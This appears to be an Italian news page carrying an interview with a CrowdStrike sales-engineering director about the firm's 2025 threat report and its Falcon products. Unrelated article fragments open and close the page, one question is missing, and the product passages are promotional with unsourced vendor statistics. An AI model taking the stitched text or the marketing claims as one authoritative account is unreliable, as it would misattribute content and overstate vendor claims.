Questa scoperta dei ricercatori di Modat evidenzia come la sicurezza fisica e informatica siano ormai inscindibili. Una vulnerabilità nel mondo digitale può avere conseguenze devastanti nel mondo reale. Se le aziende e le istituzioni non prenderanno provvedimenti immediati, le conseguenze potrebbero essere disastrose. La domanda è: quanti altri sistemi critici sono esposti senza che nessuno se ne accorga?
Nel panorama odierno della sicurezza informatica, CrowdStrike si distingue come uno dei leader più innovativi e influenti. Fondata nel 2011 da George Kurtz, Dmitri Alperovitch e Gregg Marston, l’azienda ha rapidamente guadagnato una reputazione per la sua capacità di rilevare e prevenire minacce informatiche avanzate. Con una combinazione di tecnologie all’avanguardia, intelligenza artificiale e un team di esperti di sicurezza, CrowdStrike è diventata una forza trainante nella protezione delle organizzazioni contro gli attacchi informatici.
In questa intervista a Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike, discuteremo delle sfide attuali che le aziende devono affrontare nel campo della sicurezza informatica e di come CrowdStrike sta rispondendo a queste minacce in continua evoluzione. Inoltre, parleremo del ruolo dell’intelligenza artificiale nella protezione dei dati e delle infrastrutture critiche.
La soluzione di maggior interesse fornita da CrowdStrike è la sua piattaforma Falcon, che utilizza una combinazione di analisi comportamentale e intelligenza artificiale per rilevare e rispondere alle minacce in tempo reale. Questa tecnologia ha rivoluzionato il modo in cui le aziende possono proteggere i loro sistemi, offrendo una visibilità senza precedenti sulle attività sospette e consentendo una risposta rapida ed efficace.
Luca non mancherà di discutere delle tendenze future nel campo della sicurezza informatica e di come CrowdStrike si sta preparando per affrontare le nuove sfide che di giorno in giorno emergono. Con l’aumento della digitalizzazione e l’espansione delle superfici di attacco, la capacità di adattarsi rapidamente e di innovare è cruciale per mantenere la sicurezza delle informazioni. Luca Nilo Livrieri, Director, Sales Engineering Southern Europe di CrowdStrike Accenneremo inoltre a come le attuali tensioni geopolitiche e conflitti globali, come gli scenari Ucraina/Russia, Cina/Taiwan stanno influenzando la natura e la frequenza degli attacchi cyber.
1-RHC: Il vostro Global Threat Report annuale (GTR 2025) riassume l’analisi del team di intelligence di CrowdStrike effettuata nel corso del 2024 e descrive temi, tendenze ed eventi di rilievo nel panorama delle minacce informatiche. Questo report annuale include anche valutazioni anticipate delle minacce per aiutare le organizzazioni a prepararsi e a proteggersi durante il prossimo anno. Potrebbe condividere con noi alcune delle principali tendenze e minacce emerse dal report di quest’anno e come le aziende possono utilizzare queste informazioni per migliorare la propria postura digitale per il futuro?
Luca Nilo Livrieri: Il report evidenzia alcune tendenze significative in relazione alle tipologie di attacchi: il 79% degli attacchi rilevati da CrowdStrike nel 2024 risulta aver operato senza malware, utilizzando cioè strumenti legittimi già presenti nell’ambiente della vittima, e rendendo quasi impossibile distinguere l’attività malevole. Si parla quindi di intrusioni interattive o “hands-on”. Un dato altrettanto interessante emerso è l’aumento di attacchi che sfruttano tecniche di social engineering – vishing e call back phishing su tutte. Tenendo conto di queste tendenze, le aziende devono focalizzarsi su diversi aspetti: innanzitutto su una protezione delle identità, che vengono spesso usate dagli attaccanti come initial access, e poi su un rafforzamento delle soluzioni di rilevamento in real time basate su behaviour e, infine, sull’utilizzo di soluzioni di IA per aumentare la velocità della detection, investigation e response. Dal punto di vista organizzativo è necessario formare il personale a difendersi dal social engineering, implementare workflow automatizzati di remediation e sviluppare capacità di threat hinting a 360°su tutto il perimetro aziendale 2-RHC: Quali sono i trend nello eCrime? Quanto sono diffusi attacchi tramite malware rispetto ad attacchi mirati alle identità che non prevedano l’utilizzo di malware e/o includano l’uso di social engineering potenziato eventualmente dall’Intelligenza Artificiale Generativa (GenAI) (come ad esempio con video DeepFake)?
Luca Nilo Livrieri: Secondo l’analisi che abbiamo svolto nel 2024, come accennato nella risposta alla precedente domanda, vi è stata un’alta percentuale (79%) di attacchi senza utilizzo di malware e basati su tecniche “hands-on-keyboard” e strumenti legittimi: si preferiscono quindi metodi “fileless” e living-off-the-land. Gli attacchi alle identità risultano i più frequenti, essendo ormai da anni un trend in crescita. A tal proposito si è registrato, ad esempio, un aumento del 442% negli attacchi di vishing nella seconda metà del 2024 e un crescente utilizzo di GenAI per la creazione di contenuti più convincenti a supporto nelle operazioni di social engineering.
L’utilizzo dell’intelligenza artificiale ha supportato un’evoluzione delle tattiche dal phishing tradizionale verso tecniche alternative (vishing e callback) con un aumento dell’efficacia significativo, se in passato la classica email di phishing aveva un’efficacia del 12%, oggi la stessa email generata con l’AI ha un’efficacia del 54%. 3-RHC: Kevin Mitnick, noto come “il Condor”, è stato uno degli hacker più famosi e abili della storia. La sua carriera di hacking iniziò negli anni ’80, quando si dedicò al phreaking, ovvero l’hacking dei sistemi telefonici. Mitnick era un maestro nell’arte dell’ingegneria sociale, utilizzando tecniche di manipolazione psicologica per ottenere informazioni riservate direttamente dalle persone al telefono.
Quanto è ancora importante per le organizzazioni educare gli utenti a riconoscere tentativi di attacco tramite di voice phishing (vishing)?
Luca Nilo Livrieri: L’eredità delle tecniche di social engineering di Kevin Mitnick è più rilevante che mai nel panorama attuale delle minacce informatiche. L’allarmante aumento negli attacchi di vishing (del 442%), già citato, ha dimostrato come questa tecnica tradizionale si sia evoluta e rafforzata grazie alle nuove tecnologie.
Le tecniche di manipolazione psicologica che Mitnick utilizzava negli anni ’80 sono state potenziate dall’intelligenza artificiale e dalle tecnologie di clonazione vocale, rendendo gli attacchi di vishing significativamente più convincenti e difficili da identificare. Gli attaccanti moderni sfruttano ancora le stesse vulnerabilità umane – urgenza, autorità e fiducia – ma avendo a disposizione strumenti molto più sofisticati.
L’evoluzione tecnologica ha permesso di automatizzare e scalare questi attacchi, integrandoli con altri vettori di minaccia. La capacità di generare “voci clone” realistiche e di orchestrare attacchi su larga scala rende senza dubbio il vishing una minaccia ancora più seria rispetto al passato. É fondamentale per le organizzazioni proteggersi investendo nella formazione continua del personale, conducendo simulazioni realistiche e assicurando un aggiornamento costante della consapevolezza sulle nuove tecniche di attacco. Questa formazione deve essere supportata da solidi controlli tecnici, come l’autenticazione multi-fattore e protocolli di verifica delle richieste sensibili. Le organizzazioni devono inoltre stabilire procedure chiare e verificabili per la gestione delle richieste sensibili, definendo canali di comunicazione sicuri e implementando sistemi efficaci per il reporting di tentativi sospetti. La combinazione tra consapevolezza umana e controlli tecnici rimane la migliore difesa contro il vishing moderno, proprio come ai tempi di Mitnick, purché tenga conto della necessità di strumenti e procedure specificamente adattati alle sfide contemporanee 4-RHC: Sempre in merito ai trend, pensando alle vittime dello eCrime, potrebbe indicarci delle statistiche riguardo i settori verticali più significativi nelle aree geografiche più importanti?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un quadro complesso e preoccupante della distribuzione degli attacchi eCrime a livello globale e settoriale. L’analisi mostra come gli attori delle minacce abbiano intensificato significativamente le loro attività, con un’attenzione particolare al settore finanziario, che ha subito un drammatico aumento degli attacchi, specialmente da parte di gruppi legati alla Cina – con incrementi che hanno raggiunto il 200-300%.
A livello globale il Nord America continua a essere un obiettivo primario, particolarmente per quanto riguarda le istituzioni finanziarie e le aziende tecnologiche. L’Europa ha visto una concentrazione di attacchi diretti al settore manifatturiero e ai servizi finanziari, mentre nella regione Asia-Pacifico gli attaccanti hanno mostrato un interesse particolare per il settore industriale e manifatturiero.
Il settore sanitario e le infrastrutture critiche rimangono obiettivi di elevato interesse strategico a livello globale, con un’intensificazione degli attacchi particolarmente evidente nelle economie più sviluppate. 5-RHC: Oggi, la Cina è una delle principali economie mondiali, con un forte settore manifatturiero orientato all’esportazione. Qual è oggi la portata di operazioni di spionaggio informatico da parte di attori cinesi? La maturità degli attaccanti cinesi è aumentata in modo proporzionato all’aumento del loro potere economico?
Luca Nilo Livrieri:Il Global Threat Report 2025 di CrowdStrike rivela un incremento sostanziale delle operazioni cyber cinesi, con un aumento complessivo del 150% trasversale su tutti i settori, con punte fino al 200-300% in ambiti strategicamente cruciali come il settore finanziario, mediatico, manifatturiero e ingegneristico-industriale. Questa escalation nelle attività di cyber-spionaggio riflette chiaramente l’ambizione cinese di consolidare la propria posizione di leadership tecnologica e industriale a livello globale. La maturazione delle capacità offensive cinesi è particolarmente evidente nell’evoluzione delle tattiche operative: gli attaccanti hanno abbandonato approcci più tradizionali e facilmente rilevabili in favore di metodologie più sofisticate e difficili da attribuire. Particolarmente significativa è la loro capacità di condurre operazioni stealth che evitano l’uso di malware, a favore di tecniche più sottili che sfruttano le vulnerabilità della supply chain e garantiscono una persistenza duratura nei sistemi compromessi. Questa evoluzione tecnica dimostra un chiaro allineamento con gli obiettivi strategici nazionali cinesi, come definiti nei piani quinquennali e nelle iniziative di sviluppo tecnologico del paese. La sofisticazione crescente degli attacchi cinesi rispecchia gli ingenti investimenti del paese in tecnologia e innovazione, creando una sinergia preoccupante tra potere economico e capacità cyber offensive. Per le organizzazioni globali, specialmente quelle operanti in settori strategici o quelle per le quali la proprietà intellettuale risulta un asset particolarmente significativo, questa evoluzione rappresenta una sfida crescente che richiede un approccio difensivo sempre più sofisticato e stratificato.
La minaccia rappresentata dagli attori cinesi non è più solo una questione di sicurezza informatica, ma si inserisce in un più ampio contesto di competizione geopolitica e tecnologica globale, richiedendo una risposta coordinata che coinvolga sia aspetti tecnici che strategici.
6-RHC: Considerando che, in base al vostro report GTR 2025, almeno cinque diversi threat actors state-sponsored legati alla Cina, come ad esempio APT41 (a.k.a. Wicked PANDA), utilizzano ora il malware KEYPLUG anche offuscando le loro attività attraverso reti ORB (Operational Relay Box), quali sono le principali caratteristiche di questo malware che lo rendono così versatile e resistente, e quali strategie possono adottare le organizzazioni per rilevare e mitigare tali minacce?
Luca Nilo Livrieri:KEYPLUG è un malware a bassa prevalenza, il che lo rende meno rilevabile rispetto ad altri malware più diffusi. Il suo impatto sul panorama delle minacce cyber è particolarmente significativo e ha contribuito a innalzare il livello generale di sofisticazione delle minacce. La sua condivisione tra diversi gruppi ha portato infatti a un continuo perfezionamento delle sue capacità, che l’hanno reso sempre più efficace e difficile da rilevare. La natura collaborativa dello sviluppo di KEYPLUG tra diversi gruppi di minacce cinesi sottolinea la necessità di un approccio alla sicurezza sempre più sofisticato e adattivo, capace di evolversi al passo con le crescenti capacità degli attaccanti.
Tra le caratteristiche di questo malware si trova l’utilizzo di chiavi RC4 definite dagli attori per crittografare le comunicazioni di rete, rendendo più difficile l’intercettazione e l’analisi del traffico. KEYPLUG utilizza server C2 con una durata mediana di 96 giorni, con variazioni significative tra i diversi gruppi di avversari, il che complica ulteriormente il tracciamento e la mitigazione. Per cifrare le comunicazioni tra i server C2 e i client, KEYPLUG utilizza certificati TLS auto-firmati, spesso con valori di campo predefiniti, per evitare il rilevamento. Tra le strategie che le organizzazioni possono adottare per rilevarne e mitigarne le minacce suggeriamo l’implementazione di soluzioni di monitoraggio del traffico di rete per identificare comportamenti anomali e comunicazioni sospette con server C2 noti. É consigliabile mantenere aggiornate le firme di rilevamento nei sistemi di sicurezza per includere gli indicatori di compromissione (IOC) associati a KEYPLUG, come gli indirizzi IP e i domini C2. Occorre verificare e analizzare i certificati TLS utilizzati nelle comunicazioni di rete per identificare quelli auto-firmati e sospetti. E’ necessario anche implementare la segmentazione della rete per limitare i movimenti laterali degli attaccanti e contenere eventuali compromissioni e, infine, educare il personale sulla sicurezza informatica e sulle tecniche di phishing per ridurre il rischio di compromissioni iniziali.
7-RHC: Restando in tema geografico/geopolitico, nell’ultimo decennio si è registrato un aumento delle attività criminali informatiche sponsorizzate dallo stato, (ad esempio il caso della violazione di SolarWinds, collegata alla Russia, che ha colpito la maggior parte dei governi e delle organizzazioni non governative statunitensi).Viste le recenti tensioni e conflitti (Cina/Taiwan, Russia/Ucraina, Israele/Hamas) il vostro team di cyber threat intelligence cosa ha osservato?
Luca Nilo Livrieri:Il panorama delle minacce cyber nel 2024 ha riflesso in modo significativo le crescenti tensioni geopolitiche globali, come evidenziato dal team di cyber threat intelligence di CrowdStrike. L’anno ha visto un’intensificazione senza precedenti delle attività criminali informatiche sponsorizzate da stati nazionali, con Cina, Russia e Corea del Nord in prima linea.
Nel GTR 2025 abbiamo identificato 26 nuovi avversari, portando il totale degli attori mappati a 257. La Cina ha dimostrato una notevole evoluzione nelle sue capacità offensive, registrando un incremento del 150% nelle attività di spionaggio informatico rispetto al 2023. (VEDI RISPOSTA 9 con dettaglio).
Sul fronte russo, le attività cyber sono state fortemente influenzate dal conflitto in Ucraina. Gli attori russi hanno mantenuto una presenza aggressiva nel cyberspazio, concentrandosi sulla raccolta di intelligence relativa all’Ucraina e ai membri della NATO. Le loro operazioni hanno dimostrato una notevole capacità di adattamento e di sviluppo di tecniche sempre più sofisticate.
La Corea del Nord ha invece mostrato un approccio distintivo, focalizzandosi principalmente sulla generazione di valuta attraverso operazioni cyber innovative. Il regime ha sviluppato schemi elaborati che includono frodi nel settore IT, utilizzando tattiche come interviste virtuali e “laptop farms”. Questa strategia riflette il tentativo del paese di aggirare le sanzioni internazionali attraverso mezzi cyber.
Il quadro complessivo emerso nel report evidenzia come le tensioni geopolitiche si siano tradotte in un’escalation significativa delle attività cyber sponsorizzate dagli stati. Questi attori hanno dimostrato una crescente sofisticazione nelle loro operazioni, integrando perfettamente le attività cyber con più ampi obiettivi strategici e geopolitici. Tale evoluzione sottolinea l’importanza crescente del dominio cyber come teatro di operazioni per il perseguimento di obiettivi statali, richiedendo un approccio sempre più sofisticato alla cybersecurity e una maggiore cooperazione internazionale nella risposta a queste minacce.
8-RHC: Riguardo la Corea del Nord, cosa avete osservato nei gruppi criminali che sono attivi per finanziare il regime di Pyongyang?
Luca Nilo Livrieri:Nel corso del 2024 il nostro team di cyber threat intelligence ha osservato che i gruppi criminali nordcoreani hanno continuato a focalizzarsi su operazioni informatiche atte a finanziare il regime di Pyongyang. Tra i principali elementi emersi dal nostro report c’è una innovazione nelle Operazioni di E-Crime: gruppi nordcoreani hanno innovato le loro operazioni di monetizzazione, utilizzando schemi di lavoro IT su larga scala in tutto il mondo.
È emerso come gruppo particolarmente attivo FAMOUS CHOLLIMA (304 incidenti legati a FAMOUS CHOLLIMA tracciati da CrowdStrike nel 2024). Quasi il 40% di questi incidenti rappresentava operazioni di insider threat.
I gruppi nordcoreani hanno utilizzato tecniche di social engineering per supportare la creazione di profili LinkedIn falsi con testi generati da strumenti di intelligenza artificiale generativa (genAI) e hanno sfruttato l’AI per fornire risposte più credibili durante i colloqui di lavoro. Con queste tecniche è stato possibile ingannare i recruiter e farsi assumere all’interno di grandi aziende come sviluppatori di software e tecnici IT. I “dipendenti” si facevano spedire i laptop aziendali in dotazione presso “Laptop farms” in paesi specifici per ottenere un IP pubblico di provenienza “trusted” (es. USA) e, una volta ottenuto l’accesso alle reti aziendali, installavano sui computer delle aziende strumenti di gestione remota (RMM) e estensioni del browser malevole per esfiltrare dati o eseguire altre attività malevole. 9-RHC: In base alle vostre indagini di intelligence, chi ha dominato nel 2024 il Threat Landscape a livello globale?
Luca Nilo Livrieri:Nel 2024 il panorama delle minacce cyber globali è stato caratterizzato da una predominanza significativa degli attori legati alla Cina, come già evidenziato. Le operazioni di spionaggio informatico cinesi hanno raggiunto livelli di maturità senza precedenti, registrando un incremento del 150% rispetto all’anno precedente. Questa escalation è stata accompagnata da un notevole perfezionamento delle capacità operative e della gestione infrastrutturale, in particolare attraverso l’implementazione sofisticata di reti di relay box operativi (ORB) per mascherare le loro attività.
Un aspetto particolarmente significativo del 2024 è stata l’identificazione infatti di sette nuovi attori legati alla Cina. Questo rappresenta un’evoluzione strategica importante, segnando il passaggio da operazioni di tipo “smash-and-grab” a intrusioni più mirate e sofisticate, ciascuna con obiettivi specifici e ben definiti.
La risposta degli attori cinesi alle crescenti misure di contrasto implementate da governi, forze dell’ordine e ricercatori di sicurezza, è stata notevole. Hanno intensificato l’uso di tecniche di offuscamento, sfruttando reti ORB e condividendo strumenti tra diversi gruppi, dimostrando una maggiore resilienza operativa e capacità di mantenere l’anonimato.
L’impatto di queste operazioni si è fatto sentire in modo trasversale in tutti i settori a livello globale, con un’intensità particolare in alcuni ambiti strategici. I settori dei servizi finanziari, mediatico, manifatturiero e ingegneria industriale hanno registrato aumenti drammatici nelle attività malevole, con incrementi che hanno raggiunto il 200-300% rispetto agli anni precedenti.
10-RHC: Diamo ora uno sguardo alla difesa, può spiegare come Falcon Adversary OverWatch, Falcon Next-Gen SIEM (crowdstrike.com/platform/next-…) ed i Counter Adversary Playbooks possano aiutare nel creare programmi di monitoraggio/intelligence completi e personalizzati?
Luca Nilo Livrieri:La combinazione di Falcon Adversary OverWatch, Falcon Next-Gen SIEM e Counter Adversary Playbooks rappresenta un approccio integrato alla sicurezza che permette di creare programmi di monitoraggio e intelligence altamente efficaci e personalizzati. Falcon Adversary OverWatch fornisce un monitoraggio proattivo 24/7 delle attività sospette, con analisti esperti che valutano in tempo reale potenziali minacce. Questo servizio è particolarmente efficace nell’identificare le tattiche hands-on-keyboard e le tecniche di living-off-the-land che, come evidenziato nel GTR 2025, rappresentano il 79% delle intrusioni rilevate.
La capacità di OverWatch di distinguere tra attività legittime e malevole è cruciale, specialmente considerando la crescente sofisticazione degli attacchi. Falcon Next-Gen SIEM amplifica queste capacità integrando e correlando dati da diverse fonti in un’unica piattaforma di gestione degli eventi di sicurezza. La soluzione sfrutta l’intelligenza artificiale e il machine learning per analizzare grandi volumi di dati, identificando pattern sospetti e anomalie che potrebbero indicare un’intrusione. La sua architettura cloud-native permette una scalabilità e flessibilità superiori rispetto ai SIEM tradizionali. I Counter Adversary Playbooks completano il quadro fornendo procedure operative standardizzate e best practice specifiche per contrastare determinate tipologie di attaccanti. Questi playbook, basati su anni di osservazione e analisi delle tattiche degli avversari, permettono di: anticipare le mosse degli attaccanti, implementare contromisure mirate, accelerare i tempi di risposta agli incidenti e standardizzare le procedure di risposta.
L’integrazione di questi tre elementi permette di creare un programma di sicurezza che non solo rileva e risponde alle minacce, ma le anticipa e le previene attivamente, adattandosi continuamente all’evoluzione del panorama delle minacce. La personalizzazione di questi strumenti consente inoltre di allineare le difese alle specifiche esigenze e rischi dell’organizzazione, creando un sistema di protezione su misura e altamente efficace. 11-RHC: Quali sono i punti di forza del vostro prodotto Falcon Next-Gen SIEM? In cosa vi distinguete rispetto ai vostri competitor?
Luca Nilo Livrieri: Falcon Next-Gen SIEM si distingue nel mercato per diverse caratteristiche innovative e vantaggi competitivi significativi. La piattaforma si basa su un’architettura cloud-nativa che elimina la necessità di infrastrutture on-premise complesse, offrendo scalabilità immediata e costi operativi ridotti. Questa architettura moderna permette di processare e analizzare in tempo reale volumi di dati enormi, senza i limiti tradizionali dei SIEM legacy. Un punto di forza distintivo è l’integrazione nativa con l’ecosistema Falcon, che fornisce un contesto di threat intelligence immediato e accurato. Questo significa che ogni alert viene automaticamente arricchito con informazioni contestuali provenienti dal vasto database di minacce di CrowdStrike, permettendo una valutazione più rapida e precisa delle minacce.
La piattaforma eccelle nell’analisi comportamentale, utilizzando algoritmi di machine learning avanzati per identificare anomalie e potenziali minacce. Questo approccio è particolarmente efficace nel rilevare attacchi sofisticati che potrebbero sfuggire ai sistemi tradizionali, come le tecniche “living off the land” e gli attacchi senza malware che, come evidenziato nel GTR 2025, rappresentano la maggioranza delle intrusioni moderne. Un altro elemento distintivo è la capacità di fornire visibilità completa attraverso diversi ambienti – cloud, on-premise e ibridi – con una singola console di gestione. Questo elimina i silos informativi e semplifica significativamente le operazioni di security.
La piattaforma include anche capacità avanzate di automazione e orchestrazione, che permettono di rispondere rapidamente agli incidenti riducendo i tempi di risposta e il carico di lavoro manuale per i team di sicurezza. Infine, il modello di pricing trasparente e prevedibile, basato su sottoscrizione, elimina i costi nascosti tipici dei SIEM tradizionali legati all’ingestione e alla conservazione dei dati. Queste caratteristiche, combinate con il supporto continuo del team CrowdStrike e l’accesso a threat intelligence costantemente aggiornata, rendono Falcon Next-Gen SIEM una soluzione all’avanguardia nel panorama della sicurezza informatica.
12-RHC: Per quanto riguarda tattiche, tecniche e procedure (TTP) dei threat actors, in base al vostro monitoraggio durante il 2024, qual è stata la frequenza di attacchi attraverso lo sfruttamento vulnerabilità consecutive (exploit chaining), con l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) o con Zero Days?
Vi sono possibili previsioni su questo per il 2025?
Luca Nilo Livrieri: Nel 2024 CrowdStrike ha osservato un aumento significativo nell’uso di tattiche, tecniche e procedure (TTP) avanzate da parte degli attori delle minacce, in particolare attraverso lo sfruttamento di vulnerabilità consecutive (exploit chaining), l’abuso di funzionalità legittime (tecniche LOTL, Living Off The Land) e l’uso di vulnerabilità zero-day.
Per quanto riguarda l’Exploit Chaining, gli attori delle minacce hanno frequentemente utilizzato catene di exploit per combinare più vulnerabilità e ottenere esecuzione di codice remoto (RCE) non autenticata. Ad esempio, nel novembre 2024, sono stati osservati attori che hanno combinato una vulnerabilità di bypass (CVE-2024-0012) con una vulnerabilità di escalation dei privilegi (CVE-2024-9474) nel software PAN-OS di Palo Alto Networks. Questo approccio ha consentito agli attori di aumentare le proprie capacità e l’impatto sugli obiettivi.
Essi hanno continuato a sfruttare funzionalità legittime (LOTL) dei sistemi per eseguire attacchi. Ad esempio, la funzionalità xp_cmdshell di Microsoft SQL Server è stata abusata per ottenere RCE in vari prodotti.
Gli attaccanti hanno continuato a sfruttare, inoltre, vulnerabilità zero-day per ottenere accesso iniziale e condurre attività malevole. Ad esempio, nel settembre 2024, un attore sconosciuto ha sfruttato una vulnerabilità di divulgazione di file (CVE-2024-21287) per ottenere credenziali in chiaro e successivamente ha sfruttato una vulnerabilità di deserializzazione (CVE-2024-20953) per compromettere i dispositivi.
CrowdStrike prevede che queste tattiche continueranno a essere prevalenti e si evolveranno ulteriormente nel 2025: l’exploit chaining, l’abuso di funzionalità legittime e lo sfruttamento di zero-day continueranno a rappresentare una minaccia significativa, richiedendo alle organizzazioni di adottare misure proattive.
13-RHC: L’abuso di account validi è diventato il principale vettore di accesso iniziale; le credenziali spesso vengono ottenute attraverso l’uso di information stealers o il social engineering.
Qual è l’impatto di ciò in attacchi a infrastrutture cloud aziendali?
Luca Nilo Livrieri: L’abuso di account validi è emerso come vettore principale di accesso iniziale agli ambienti cloud aziendali, rappresentando una minaccia significativa per la sicurezza delle infrastrutture cloud moderne.
Secondo il GTR 2025 questa tendenza ha registrato un impatto particolarmente rilevante, con un 35% di incidenti cloud legati proprio all’abuso di credenziali legittime che si lega al dato relativo agli annunci pubblicitari di credenziali degli access broker che sono aumentati del 50% su base annua.
Gli attaccanti hanno perfezionato le loro strategie di acquisizione delle credenziali, utilizzando principalmente due approcci: l’impiego di information stealers e di sofisticate tecniche di social engineering. Una volta ottenuto l’accesso iniziale attraverso credenziali valide, gli attori delle minacce possono muoversi lateralmente nell’ambiente cloud senza destare sospetti, sfruttando la legittimità apparente delle loro azioni per eludere i sistemi di sicurezza tradizionali.
La persistenza negli ambienti compromessi viene spesso stabilita attraverso la registrazione di dispositivi per l’autenticazione MFA o la creazione di backdoor sofisticate. Ciò permette agli attaccanti di mantenere l’accesso anche dopo eventuali modifiche alle credenziali iniziali. Particolarmente preoccupante è la capacità di questi attori di eludere le difese tradizionali, poiché l’uso di credenziali legittime rende estremamente difficile distinguere le attività malevoli da quelle lecite.
SCATTERED SPIDER, ad esempio, ha dimostrato particolare abilità nell’utilizzare account SSO compromessi per accedere a applicazioni critiche come SharePoint e Outlook, evidenziando la vulnerabilità delle soluzioni SaaS a questo tipo di attacchi. Questa tendenza è destinata a intensificarsi nel 2025, in quanto ci si aspetta che gli attaccanti continueranno a perfezionare le loro tecniche di evasione e a concentrarsi sempre più su obiettivi SaaS e cloud.
Per contrastare questa minaccia crescente, le organizzazioni devono implementare misure di sicurezza avanzate che vadano oltre la semplice protezione perimetrale. È essenziale adottare un approccio multilivello che includa il monitoraggio comportamentale, l’analisi delle anomalie e sistemi robusti di gestione delle identità e degli accessi. Solo attraverso una strategia di sicurezza completa e integrata sarà possibile mitigare efficacemente il rischio rappresentato dall’abuso di account validi negli ambienti cloud.
14-RHC: Ripensando agli attacchi in cui vengono sfruttate vulnerabilità di tipo Zero Day, è possibile rimanere un passo avanti (o almeno allo stesso passo) rispetto alla intraprendente esuberanza e alle continue innovazioni della criminalità digitale?Può l’attuale Intelligenza Artificiale Generativa (GenAI) essere di aiuto in questo?
Luca Nilo Livrieri:La sfida posta dalle vulnerabilità Zero Day nel panorama attuale della cybersecurity rappresenta una delle problematiche più complesse da affrontare, come evidenziato dai dati del GTR 2025. La rapidità con cui gli attaccanti riescono a sfruttare queste vulnerabilità, con tempi di “breakout” ridotti a una media di 48 minuti e picchi di efficienza di soli 51 secondi, impone un ripensamento radicale delle strategie difensive tradizionali.
L’Intelligenza Artificiale Generativa emerge come strumento potenzialmente rivoluzionario in questo contesto. La sua capacità di analizzare pattern complessi, generare scenari predittivi, e automatizzare risposte in tempo reale offre certamente nuove possibilità. L’implementazione di sistemi GenAI avanzati permette di sviluppare approcci proattivi alla sicurezza, anticipando potenziali vettori di attacco attraverso l’analisi predittiva e la simulazione di scenari complessi.
Nel contesto specifico delle vulnerabilità Zero Day, la GenAI dimostra particolare efficacia nell’analisi del codice sorgente e nell’identificazione di potenziali vulnerabilità prima che possano essere sfruttate. La sua capacità di processare e correlare enormi quantità di dati in tempo reale permette di identificare anomalie comportamentali e pattern sospetti che potrebbero indicare lo sfruttamento di vulnerabilità non ancora documentate. Tuttavia, è fondamentale riconoscere che la GenAI non rappresenta una soluzione definitiva, ma piuttosto un potente strumento da integrare in una strategia di sicurezza più ampia. L’efficacia di questi sistemi dipende infatti dalla qualità dei dati di addestramento e dalla loro continua ottimizzazione attraverso il feedback degli analisti di sicurezza. La componente umana rimane quindi essenziale, specialmente nell’interpretazione contestuale delle minacce e nella definizione delle strategie di risposta.
La vera innovazione risiede nella sinergia tra expertise umana e capacità computazionali della GenAI, sinergia che permette di sviluppare sistemi di difesa adattivi che possano evolversi rapidamente in risposta a nuove minacce, mantenendo al contempo la capacità di discriminazione e il giudizio critico necessari per evitare falsi positivi e ottimizzare le risorse di sicurezza. L’implementazione di framework di sicurezza basati su GenAI richiede un approccio olistico che includa monitoraggio continuo, threat hunting proattivo e capacità di risposta rapida agli incidenti. La formazione continua del personale di sicurezza nell’utilizzo efficace di questi strumenti diventa cruciale per massimizzare il potenziale.
L’integrazione della GenAI nelle strategie di sicurezza moderne offre infatti la possibilità di ridurre significativamente il divario temporale tra l’identificazione di una vulnerabilità e la sua mitigazione. Questo, combinato con approcci tradizionali di sicurezza e expertise umana, rappresenta attualmente la migliore strategia per mantenere una postura di sicurezza robusta di fronte all’evoluzione continua delle minacce Zero Day.
Luca Nilo Livrieri: Charlotte AI rappresenta un’implementazione di un sistema di intelligenza artificiale generativa con capacità agentic, che abbiamo integrato nativamente nella piattaforma Falcon di CrowdStrike. L’architettura multi-tenant, cloud-native, dell’assistente è stata progettata per operare su scala enterprise, processando petabyte di dati telemetrici in tempo reale attraverso una sofisticata infrastruttura distribuita.
L’architettura di machine learning sfrutta tecniche avanzate di transfer learning da modelli pre-addestrati, con fine-tuning continuo su dati cliente, ensemble methods per migliorare l’accuracy e sofisticati feedback loop per continuous learning. Il sistema di monitoring fornisce telemetria real-time delle performance, metriche di accuracy e precision, latency tracking e resource utilization monitoring.
Questa implementazione tecnica rappresenta un significativo avanzamento nell’applicazione di tecnologie AI alla cybersecurity, combinando modelli di machine learning all’avanguardia con architetture distribuite scalabili. La piattaforma evolve continuamente attraverso l’introduzione di nuove capacità tecniche e ottimizzazioni delle performance, mantenendo un focus sulla scalabilità enterprise e sulla sicurezza dei dati.
L’architettura modulare garantisce l’adattabilità alle minacce emergenti e alle esigenze, sempre in evoluzione, dei team di sicurezza, permettendo l’integrazione continua di nuovi modelli e capacità analitiche aiutando nelle fasi di detection, investigation e response.
16-RHC: Luca, la ringraziamo ancora per averci dato la possibilità di farle questa intervista sul vostro Global Threat Report 2025. C’è qualcosa che vuole aggiungere o che reputa interessante porre all’attenzione dei nostri lettori?
Luca Nilo Livrieri: Si, mi piacerebbe chiudere con qualche raccomandazione e best practices che suggeriamo di seguire:
Proteggere l’intero ecosistema delle identità adottando MFA resistenti al phishing, implementando politiche di accesso forti e utilizzando strumenti di rilevamento delle minacce alle identità integrati con piattaforme XDR.
Eliminare i gap di visibilità cross-domain: modernizzando le strategie di rilevamento e risposta con soluzioni XDR e SIEM di nuova generazione, svolgendo threat hunting proattivo e utilizzando intelligence sulle minacce.
Difendere il cloud come infrastruttura core: utilizzare CNAPP con capacità CDR, eseguire audit regolari per scoprire configurazioni errate e vulnerabilità non patchate.
Dare priorità al patching dei sistemi critici e utilizzare strumenti come Falcon Exposure Management per concentrarsi sulle vulnerabilità ad alto rischio.
Adottare un approccio basato sull’intelligence, integrare l’intelligence nelle operazioni di sicurezza, avviare programmi di consapevolezza degli utenti e svolgere esercitazioni di tabletop e red/blue teaming.
La Procura Distrettuale di Catania ha coordinato una operazione nazionale contro lo sfruttamento sessuale dei minori online condotta dalla Polizia di Stato. Si tratta di una tra le più vaste azioni compiute ad oggi in Italia. Oltre 500 operatori della Polizia Postale hanno eseguito oltre 100 perquisizioni nei confronti di altrettanti indagati, traendo in arresto 34 persone.
I dettagli della operazione saranno illustrati alle ore 10.30 presso la sala stampa della Procura Distrettuale sita in viale XX Settembre n.51.
La Polizia di Stato dimostra ancora una volta la sua determinazione nel contrastare i reati più odiosi, ribadendo il proprio impegno nella tutela dei più vulnerabili. Le indagini, condotte con strumenti tecnologici avanzati e in stretta collaborazione con organismi internazionali, hanno permesso di smantellare una rete di scambio di materiale pedopornografico, individuando decine di soggetti coinvolti in attività illecite a danno di minori.
